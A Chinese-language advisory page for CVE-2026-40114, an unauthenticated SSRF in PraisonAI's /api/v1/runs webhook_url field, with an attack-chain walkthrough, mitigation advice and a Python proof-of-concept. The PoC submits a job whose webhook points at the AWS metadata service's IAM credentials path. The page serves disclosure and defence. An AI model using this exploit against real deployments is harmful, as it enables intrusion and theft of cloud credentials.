CVE-2026-40114 CVSS 7.2 高危

CVE-2026-40114 PraisonAI SSRF漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40114

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PraisonAI

漏洞概述

PraisonAI在4.5.128版本之前的/api/v1/runs端点存在服务端请求伪造（SSRF）漏洞。该接口未对请求体中的webhook_url参数进行有效验证，允许未经身份验证的攻击者指定任意URL。当作业完成时，服务器会向该URL发送HTTP POST请求，攻击者可利用此行为探测内网服务或攻击云元数据服务。

技术细节

该漏洞的根源在于PraisonAI在处理作业运行回调时缺乏对目标URL的安全限制。系统使用httpx.AsyncClient向用户提供的webhook_url发起异步POST请求，且未对目标地址进行内网IP校验或DNS重绑定防护。由于无需认证（PR:N）且无用户交互（UI:N），攻击者可构造恶意请求，将webhook_url设置为内部服务地址（如AWS元数据服务169.254.169.254）。服务器随后充当代理，向内网发送请求并将结果返回给攻击者，从而导致敏感信息泄露或内部服务被攻击。

攻击链分析

STEP 1

1. 侦察与探测

攻击者识别出目标互联网上存在的PraisonAI服务实例，并确认其版本低于4.5.128。

STEP 2

2. 构造恶意请求

攻击者向/api/v1/runs端点发送POST请求，在请求体的webhook_url字段中填入内网敏感地址（如云元数据服务）。

STEP 3

3. 触发SSRF

PraisonAI服务器接收请求并处理作业。作业完成后，服务器解析webhook_url并向攻击者指定的内网地址发送HTTP POST请求。

STEP 4

4. 数据回传与利用

内网服务响应服务器的请求，攻击者通过控制回调接收端或观察服务器响应时间，获取内网敏感信息或进一步渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_ssrf(target_url, internal_url):
    """
    PoC for CVE-2026-40114
    Attempts to trigger an SSRF by submitting a job to PraisonAI
    with a malicious webhook_url pointing to an internal service.
    """
    endpoint = f"{target_url}/api/v1/runs"
    
    # Payload containing the internal URL to be accessed
    payload = {
        "webhook_url": internal_url,
        "task": "example_task"
    }

    try:
        print(f"[*] Sending SSRF request to {endpoint} pointing to {internal_url}")
        response = requests.post(endpoint, json=payload, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request accepted successfully. Check the internal service logs for connection attempts.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
            
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://vulnerable-praisonai-instance.com"
    # Targeting AWS Metadata Service as an example
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    exploit_ssrf(target, internal_target)

影响范围

PraisonAI < 4.5.128

防御指南

临时缓解措施

建议立即将PraisonAI组件升级至4.5.128或更高版本以修复此漏洞。如果无法立即升级，应在网络边界处部署严格的白名单策略，利用防火墙或安全组阻断服务器向非业务必要的外部或内网敏感网段（如169.254.169.254）发起的HTTP请求，并监控出站流量异常。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表